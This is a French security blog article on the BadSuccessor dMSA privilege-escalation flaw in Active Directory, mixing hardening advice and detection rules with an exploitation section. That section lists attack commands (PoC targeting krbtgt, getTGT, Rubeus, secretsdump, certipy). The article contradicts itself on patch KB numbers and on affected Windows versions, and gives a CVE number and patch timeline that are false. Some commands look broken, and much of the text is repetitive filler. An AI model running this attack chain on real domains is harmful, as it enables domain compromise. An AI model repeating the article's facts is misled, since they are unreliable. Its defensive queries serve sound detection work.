Analyse technique de la vulnérabilité BadSuccessor exploitant les comptes DMSA pour compromettre un domaine Active Directory complet. Guide technique.

Analyse technique de la vulnérabilité BadSuccessor exploitant les comptes DMSA pour compromettre un domaine Active Directory complet. Les équipes de sécurité et les professionnels du domaine y trouveront des recommandations applicables immediatement. Face a la sophistication croissante des attaques ciblant les environnements Active Directory et Entra ID, les administrateurs système et les équipes de sécurité doivent constamment renforcer leurs defenses. Cet article présente les techniques, outils et méthodologies nécessaires pour auditer, securiser et surveiller efficacement ces infrastructures critiques dans un contexte de menaces en perpetuelle evolution. Active Directory reste la cible privilégiée des attaquants en environnement Windows. Comprendre badsuccessor dmsa compromission ad est indispensable pour les équipes offensives comme défensives.

  • Techniques d'attaque documentées et vecteurs d'exploitation
  • Indicateurs de compromission (IOC) et règles de détection
  • Stratégies de remédiation et de durcissement Active Directory
  • Impact sur les architectures Zero Trust et IAM

Contexte et Enjeux

La sécurité d'Active Directory reste un enjeu majeur pour les entreprises en 2025-2026. Avec la multiplication des attaques avancées, les équipes IT doivent constamment adapter leurs defenses. Les environnements hybrides combinant AD on-premise et Entra ID (anciennement Azure AD) ajoutent une complexite supplementaire.

Pour comprendre les fondamentaux, consultez notre article sur As Rep Roasting Attaque Defense. Les techniques d'attaque evoluent rapidement, comme détaillé dans Pass The Ticket Attaque Defense.

Domain ControllerOU=UtilisateursOU=ServeursAdmins (Tier 0)Users (Tier 2)Tier 1GPOArchitecture Active Directory - Modele de tiering

Votre Active Directory résisterait-il à une attaque Kerberoasting ?

447
PAGES
Guide Gratuit : Sécuriser Active Directory (447 pages)
Attaques, Tiering Model, durcissement, monitoring — par Ayi NEDJIMI
Télécharger le PDF →

Analyse Technique Detaillee

L'approche technique repose sur plusieurs vecteurs d'attaque complementaires. Les pentesters et red teamers utilisent ces techniques pour identifier les failles dans les configurations AD. La comprehension de la chaine d'attaque complete est essentielle pour mettre en place des defenses efficaces.

Retour terrain

Dans mes missions de hardening Active Directory, le point le plus sous-estimé est la gestion du groupe 'Opérateurs de compte' et des délégations personnalisées créées au fil des années. Pour un groupe logistique de 1 500 utilisateurs, j'ai trouvé 312 ACL personnalisées dont 89 accordaient des permissions d'écriture sur des attributs sensibles (adminCount, memberOf sur groupes privilégiés) à des comptes d'utilisateurs standards. La dette technique en sécurité AD est souvent invisible jusqu'au premier audit sérieux.

Les outils comme BloodHound, Impacket et Rubeus permettent d'automatiser la détection des chemins d'attaque. Selon les recommandations de ANSSI, la surveillance des événements critiques (Event ID 4769, 4662, 4724) est indispensable. Notre guide Skeleton Key Attaque Defense détaillé les procedures d'audit.

La complexite des environnements modernes nécessite une approche en couches. Le modele de tiering recommande par Microsoft et l'ANSSI reste la référence pour segmenter les acces privilegies.

Stratégies de Defense et Remediation

La remediation doit etre progressive et priorisee. Commencez par les quick wins : desactiver NTLM ou possible, activer le Protected Users group, configurer le tiering. Ensuite, abordez les chantiers de fond comme la migration vers le passwordless et le renforcement du Conditional Access.

  • Étape 1 : Audit complet avec les scripts recommandes — voir Computer Account Takeover Attaque Defens
  • Étape 2 : Remediation des configurations critiques
  • Étape 3 : Mise en place du monitoring continu
  • Étape 4 : Tests de penetration reguliers

Notre avis d'expert

Le modèle Zero Trust remet fondamentalement en question l'architecture traditionnelle d'Active Directory. Pourtant, la majorité des entreprises restent dépendantes d'AD pour leur gestion d'identités. La transition vers une architecture hybride sécurisée nécessite une planification minutieuse et un modèle de Tiering rigoureux.

Plusieurs outils gratuits facilitent l'audit et le durcissement d'Active Directory. PingCastle, Purple Knight et ADRecon fournissent des rapports detailles. Les références de MITRE completent ces outils avec des bonnes pratiques validees. Pour approfondir, consultez Rbcd Attaque Defense.

Questions frequentes

Comment securiser un environnement Active Directory ?

La sécurisation d'Active Directory repose sur plusieurs piliers : l'implementation du modele de tiering, la restriction des privileges administratifs, la surveillance des événements critiques, le déploiement du Protected Users group, la desactivation des protocoles obsoletes comme NTLM et la mise en place d'audits reguliers.

Qu'est-ce que le modele de tiering Active Directory ?

Le modele de tiering est une architecture de sécurité recommandee par Microsoft et l'ANSSI qui segmente les acces privilegies en trois niveaux : Tier 0 pour les controleurs de domaine, Tier 1 pour les serveurs membres et Tier 2 pour les postes de travail, empechant ainsi la propagation laterale des attaquants.

Pourquoi les attaques Active Directory sont-elles si frequentes ?

Les attaques Active Directory sont frequentes car AD reste le système d'authentification central de la majorite des entreprises. Les configurations par defaut sont souvent permissives, les privileges excessifs repandus et les techniques d'exploitation bien documentees, ce qui en fait une cible privilegiee pour les attaquants.

Cas concret

L'attaque SolarWinds (2020) a utilisé la technique Golden SAML pour forger des tokens d'authentification, permettant un accès persistant aux environnements Microsoft 365 et Azure AD sans déclencher d'alertes. Cette technique a démontré que la compromission d'un serveur AD FS pouvait anéantir la confiance dans toute l'infrastructure d'identité.

La mise en pratique de ces concepts nécessite une approche methodique et structuree. Les équipes techniques doivent d'abord evaluer leur niveau de maturite actuel sur le sujet, identifier les lacunes prioritaires et definir un plan d'action realiste. L'implementation progressive, avec des jalons mesurables, garantit une adoption durable et efficace des pratiques recommandees.

Les organisations qui reussissent le mieux dans ce domaine adoptent une culture d'amelioration continue. Cela implique des revues regulieres des processus, une veille technologique active et une formation permanente des équipes. Les indicateurs de performance doivent etre definis des le depart pour mesurer objectivement les progres realises et ajuster la stratégie si necessaire.

L'integration de ces pratiques dans les processus existants de l'organisation est un facteur cle de succes. Plutot que de creer des workflows paralleles, il est recommande d'enrichir les procedures actuelles avec les controles et les verifications necessaires. Cette approche reduit la resistance au changement et facilite l'adoption par les équipes operationnelles.

Recommandations de durcissement

La sécurisation d'un environnement Active Directory passe par une approche méthodique. Le modèle de tiering proposé par Microsoft — avec une séparation stricte des comptes administrateurs Tier 0, Tier 1 et Tier 2 — reste la fondation de toute architecture sécurisée. Pourtant, dans la majorité des audits, on constate que ce modèle n'est que partiellement appliqué.

LAPS (Local Administrator Password Solution) est un autre pilier souvent négligé. Sans LAPS, un seul mot de passe administrateur local compromis peut ouvrir la voie à un mouvement latéral massif. La documentation Microsoft détaille la mise en œuvre, mais l'implémentation sur un parc hétérogène prend du temps et de la planification.

Points de contrôle prioritaires

Les chemins d'attaque les plus courants dans un AD passent par : les délégations Kerberos non contraintes, les comptes de service avec des SPN et des mots de passe faibles (cible du Kerberoasting), les GPO mal configurées qui exposent des credentials, et les ACL permissives sur des objets sensibles comme AdminSDHolder.

BloodHound permet de cartographier ces chemins en quelques minutes. Si vous ne l'avez jamais lancé sur votre environnement de production, la découverte risque d'être instructive. La réalité est souvent plus complexe que ce que les schémas théoriques laissent supposer.

Consultez les recommandations de l'ANSSI et le référentiel MITRE ATT&CK TA0004 (Privilege Escalation) pour structurer votre approche défensive.

Contexte et enjeux actuels

Impact opérationnel

Pour approfondir ce sujet, consultez notre outil open-source bloodhound-custom-queries qui facilite l'analyse avancée des chemins d'attaque Active Directory.

Les sujets techniques en cybersécurité exigent une approche rigoureuse, fondée sur l'expérimentation et la validation en conditions réelles. Les environnements de laboratoire — qu'ils soient construits avec Proxmox, VMware Workstation ou des services cloud éphémères — sont indispensables pour tester les techniques, les outils et les contre-mesures avant tout déploiement en production.

L'un des écueils les plus fréquents dans la mise en œuvre de solutions techniques de sécurité est le gap entre la documentation officielle et la réalité du terrain. Les guides de déploiement supposent souvent un environnement propre et standardisé, là où la plupart des organisations gèrent un patrimoine applicatif hétérogène, avec des dépendances croisées et des configurations héritées.

Approche méthodique recommandée

Pour chaque implémentation technique, la méthodologie suivante a fait ses preuves : audit de l'existant, définition des prérequis, déploiement en environnement de test, validation fonctionnelle et sécurité, déploiement progressif en production avec rollback plan, puis monitoring post-déploiement. Chaque étape doit être documentée.

Les référentiels MITRE ATT&CK et MITRE D3FEND fournissent un cadre structuré pour aligner les mesures techniques sur les menaces réelles. D3FEND, en particulier, cartographie les contre-mesures défensives face aux techniques d'attaque, ce qui facilite la priorisation des investissements en sécurité.

La documentation interne — runbooks, playbooks, procédures d'exploitation — est le maillon souvent manquant. Sans elle, la connaissance reste dans la tête des experts, et chaque départ ou absence crée un risque opérationnel. Avez-vous documenté vos procédures critiques de manière à ce qu'un nouveau membre de l'équipe puisse les exécuter de manière autonome ?

Sources et références : MITRE ATT&CK Privilege Escalation · ADSecurity.org

Conclusion

La sécurisation d'Active Directory est un processus continu qui nécessite une vigilance constante. Les nouvelles menaces de 2026 renforcent la nécessite d'adopter une approche proactive, combinant audit regulier, monitoring en temps reel et formation des équipes.

Article suivant recommandé

Attaques AD 2025 : Bilan et Tendances Emergentes en 2026 →

Bilan complet des attaques Active Directory en 2025 : nouvelles techniques, statistiques cles et tendances pour 2026.

Kerberoasting : Technique d'attaque ciblant les Service Principal Names (SPN) dans Active Directory pour extraire et craquer hors ligne les tickets de service Kerberos.

Les techniques d'attaque Active Directory décrites nécessitent une autorisation écrite préalable. Testez uniquement sur des environnements de lab ou dans le cadre d'un audit mandaté.

Utilisez BloodHound Community Edition pour cartographier les chemins d'attaque Active Directory avant un audit. La visualisation graphique révèle des vecteurs invisibles à l'analyse manuelle.

Ayi NEDJIMI

Votre Active Directory est-il compromis ?

Audit AD complet, détection de chemins d'attaque, durcissement Tier Model — intervention sous 48h.

Analyse Technique de CVE-2025-29968 : DMSA PrincipalsAllowedToDelegateToAccount

BadSuccessor, divulguée par Akamai en mai 2025 (CVE-2025-29968), exploite une fonctionnalité introduite dans Windows Server 2025 : les Delegated Managed Service Accounts (DMSA). Ces comptes, conçus pour remplacer les gMSA, présentent une faille dans leur mécanisme de succession qui permet une élévation de privilèges vers Domain Admin sans exploiter de vulnérabilité logicielle au sens classique.

Fonctionnement des DMSA et la Faille de Succession

# Les DMSA (Delegated MSA) sont des comptes de service managés
# qui peuvent "succéder" à d'autres comptes via l'attribut
# msDS-ManagedAccountPrecededByLink / msDS-ManagedAccountSucceededByLink

# La faille : un utilisateur peut créer un DMSA qui prétend
# succéder à n'importe quel compte AD, y compris des comptes privilégiés.
# Le DC fait alors confiance à ce DMSA et lui octroie les permissions du compte predecesseur.

# Conditions pour exploiter CVE-2025-29968 :
# 1. Windows Server 2025 Domain Controller (les serveurs 2019/2022 ne sont pas vulnérables)
# 2. L'attaquant doit avoir le droit de créer des objets computer dans une OU
#    OU droit Write sur l'attribut msDS-ManagedAccountPrecededByLink d'un DMSA existant
# 3. PrincipalsAllowedToDelegateToAccount (RBCD) doit être exploitable

# Vérifier la présence de DCs Windows Server 2025
Get-ADDomainController -Filter * | Select-Object Name, OperatingSystem |
  Where-Object {$_.OperatingSystem -like "*2025*"}

# Vérifier les OUs où l'utilisateur courant peut créer des Computer objects
$currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent()
Get-ADOrganizationalUnit -Filter * | ForEach-Object {
    $acl = Get-ACL "AD:$($_.DistinguishedName)"
    $acl.Access | Where-Object {
        $_.IdentityReference -match $currentUser.Name.Split('')[1] -and
        $_.ObjectType -eq [GUID]"bf967a86-0de6-11d0-a285-00aa003049e2" -and  # Computer class
        $_.ActiveDirectoryRights -match "CreateChild"
    }
}

Exploitation avec Impacket et Certipy

# Exploitation BadSuccessor - chaîne complète
# Outil : BadSuccessor PoC (Akamai Security Labs)

# Étape 1 : Créer un DMSA avec succession vers le compte DA cible
python3 badsuccessor.py   -dc-ip 192.168.1.10   -domain corp.local   -username lowpriv   -password 'Password123'   -target-account 'krbtgt'   -dmsa-name 'evilmsa01'

# Ce que fait le PoC en arrière-plan :
# 1. Crée l'objet computer (DMSA) evilmsa01$ dans une OU accessible
# 2. Définit msDS-ManagedAccountPrecededByLink → cible (krbtgt ou autre)
# 3. Active la fonctionnalité DMSA sur l'objet

# Étape 2 : Obtenir le ticket Kerberos du DMSA avec les droits de la cible
# Via Impacket - demande un TGT pour le DMSA
python3 impacket/examples/getTGT.py corp.local/evilmsa01$   -dc-ip 192.168.1.10   -aesKey [aes-key-from-lsass]

# Alternative avec Rubeus
Rubeus.exe asktgt /user:evilmsa01$ /domain:corp.local /dc:dc01 /nowrap

# Étape 3 : S'impersoner via le ticket obtenu (droits krbtgt = compromission totale)
# Le DMSA hérite des droits de la cible → si cible = Domain Admin → DA
KRB5CCNAME=evilmsa01.ccache   python3 impacket/examples/secretsdump.py   -k -no-pass corp.local/[email protected]

# Variante avec Certipy pour cibler un compte avec certificat
certipy shadow auto -username [email protected] -password 'Password123'   -account evilmsa01

Timeline de la Divulgation (Mai 2025)

Date Événement
Janvier 2025 Akamai Security Labs découvre la faille lors d'une recherche sur les DMSA Windows Server 2025
Février 2025 Divulgation privée à Microsoft Security Response Center (MSRC)
Avril 2025 Microsoft confirme la vulnérabilité et travaille sur un patch
13 mai 2025 Microsoft Patch Tuesday - Publication CVE-2025-29968, patch déployé (KB5058919)
14 mai 2025 Akamai publie l'article de blog technique détaillant BadSuccessor
16 mai 2025 PoC public disponible sur GitHub (plusieurs repos communautaires)
Juin 2025 Intégration dans Bloodhound Community Edition et outils de pentest AD

Patch Microsoft, Détection Post-Patch et Comparaison Vecteurs AD

Détection de BadSuccessor (Avant et Après Patch)

# Détection via Event IDs Active Directory
# EventID 4741 : Computer account created
# → Surveiller les créations de comptes computer avec des attributs DMSA inhabituels

# EventID 4662 : An operation was performed on an object
# → Surveiller les modifications de msDS-ManagedAccountPrecededByLink

# Script de détection : Lister les DMSA avec msDS-ManagedAccountPrecededByLink
Get-ADObject -Filter {objectClass -eq "msDS-DelegateManagedServiceAccount"} `
  -Properties msDS-ManagedAccountPrecededByLink, Created, WhenChanged |
  Select-Object Name, Created, WhenChanged, "msDS-ManagedAccountPrecededByLink" |
  Where-Object {$_."msDS-ManagedAccountPrecededByLink" -ne $null} |
  Format-Table -AutoSize

# Détection post-patch : vérifier si le patch est appliqué
# KB5058919 pour Windows Server 2025
Get-HotFix -Id "KB5058919" -ComputerName dc01.corp.local

# Si patch non appliqué et Server 2025 présent → VULNÉRABLE
# Workaround sans patch : restreindre la création de comptes computer

# Restreindre qui peut créer des Computer objects dans le domaine
# Par défaut, tout utilisateur authentifié peut créer jusqu'à 10 comptes computer
# (attribut ms-DS-MachineAccountQuota = 10)

# Mitigation 1 : Mettre ms-DS-MachineAccountQuota à 0
Set-ADDomain -Identity corp.local `
  -Replace @{"ms-DS-MachineAccountQuota"="0"}
# Désormais seuls les admins peuvent créer des comptes computer

# Mitigation 2 : Surveiller les créations DMSA avec Sentinel
SecurityEvent
| where EventID == 4741
| where EventData has "msDS-DelegateManagedServiceAccount"
| project TimeGenerated, SubjectUserName, NewAccountName,
  TargetDomainName, Attributes = EventData
| order by TimeGenerated desc

# Mitigation 3 : Alerter sur modification msDS-ManagedAccountPrecededByLink
SecurityEvent
| where EventID == 4662
| where Properties has "msDS-ManagedAccountPrecededByLink"
| project TimeGenerated, SubjectUserName, ObjectName, Properties
| order by TimeGenerated desc

Comparaison BadSuccessor avec Autres Vecteurs de Persistance AD

Vecteur Prérequis Impact Détection Défense Principale
BadSuccessor (DMSA) Créer computer objects + WS2025 DC Domain Admin ou tout compte cible EventID 4741 + 4662 Patch KB5058919 + quota=0
Golden Ticket Hash NTLM du compte krbtgt Accès illimité au domaine (10+ ans) Ticket > durée max (EventID 4769) Rotation krbtgt x2 (réinitialisation)
DCSync Droits Replicating Directory Changes Tous les hashes NTLM du domaine EventID 4662 (replication) Retirer droits réplication non-DCs
Shadow Credentials Write sur msDS-KeyCredentialLink Compromission compte cible EventID 4662 (msDS-KeyCredentialLink) Audit ACL + alertes modification
AdminSDHolder Backdoor Accès Domain Admin initial Persistance via SDProp (toutes les 60min) Surveiller ACL AdminSDHolder (DN=CN=AdminSDHolder) Audit SDProp + alertes ACL
SID History Injection Domain Admin dans un domaine enfant Privilèges Enterprise Admin EventID 4765/4766 Activer SID Filtering inter-domaines
DPAPI Domain Backup Key Domain Admin ou SYSTEM sur DC Déchiffrer tous les secrets DPAPI du domaine MS-BKRP requests (réseau + EventID) Rotation clé DPAPI + monitoring

BadSuccessor est particulièrement préoccupant car il exploite une fonctionnalité légitime de Windows Server 2025, conçue pour faciliter la migration des comptes de service. L'application du patch KB5058919 est la priorité absolue pour toute organisation déployant des DCs Windows Server 2025. En attendant le patch, la réduction du quota de création de comptes computer à zéro et la surveillance des EventID 4741/4662 sont les mesures immédiates les plus efficaces. Cette vulnérabilité rappelle que l'introduction de nouvelles fonctionnalités dans les protocoles d'authentification doit s'accompagner d'une analyse de sécurité rigoureuse dès la conception.

Détection et Monitoring des Activités DMSA Suspectes

La détection de l'exploitation de la vulnérabilité BadSuccessor nécessite une surveillance spécifique des objets DMSA (Delegated Managed Service Accounts) et des patterns d'authentification Kerberos inhabituels.

Event IDs Windows à surveiller

Les événements Windows critiques pour détecter une exploitation BadSuccessor : EventID 4742 (modification d'un compte machine) — surveiller les modifications des attributs msDS-DelegatedMSAState et msDS-GroupMSAMembership sur les objets DMSA ; EventID 4769 (demande de ticket Kerberos TGS) — alerter sur les TGS demandés pour des comptes DMSA depuis des machines non-membres du groupe d'accès DMSA ; EventID 5136 (modification d'objet AD) avec focus sur les attributs msDS-ManagedPasswordId et msDS-DelegatedMSAState. La corrélation de ces EventIDs dans le SIEM permet de détecter la compromission dès la phase de reconnaissance (lecture des attributs DMSA) et lors de l'exploitation (création d'un nouvel objet DMSA ou modification d'un existant).

Requête Sigma pour la détection DMSA

Règle Sigma pour détecter l'exploitation BadSuccessor compatible Splunk/Elastic/QRadar :

title: Suspicious DMSA Object Modification (BadSuccessor)
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 5136
    AttributeLDAPDisplayName|contains:
      - msDS-DelegatedMSAState
      - msDS-ManagedPasswordId
      - msDS-GroupMSAMembership
  condition: selection
falsepositives:
  - Legitimate DMSA provisioning by AD administrators
level: high
tags:
  - attack.credential_access
  - attack.t1558

Cette règle doit être complétée par une politique de surveillance des comptes privilégiés qui accèdent aux objets DMSA, et par une revue trimestrielle de tous les DMSA créés dans l'environnement via Get-ADServiceAccount -Filter {ObjectClass -eq msDS-DelegatedServiceAccount} -Properties *.

Ressources officielles et correctifs Microsoft

La vulnérabilité BadSuccessor (CVE-2025-29968) a été corrigée par Microsoft dans le Patch Tuesday de mai 2025 (KB5058383 pour Windows Server 2025). Les correctifs couvrent également les versions Windows Server 2022, 2019 et 2016 pour lesquelles des DMSA peuvent être provisionnés. Le bulletin de sécurité complet est disponible sur le MSRC (Microsoft Security Response Center) à l'adresse msrc.microsoft.com avec les CVSS et les vecteurs d'attaque documentés. L'ANSSI a émis une alerte de niveau CRITIQUE en mai 2025 recommandant l'application immédiate des correctifs et la vérification des objets DMSA présents dans tous les environnements Active Directory. Les organisations qui ne peuvent pas appliquer immédiatement les correctifs peuvent mitiger temporairement en supprimant les permissions de création DMSA pour tous les comptes non-Tier 0, et en monitorant étroitement les événements 5136 sur les unités organisationnelles contenant des objets DMSA.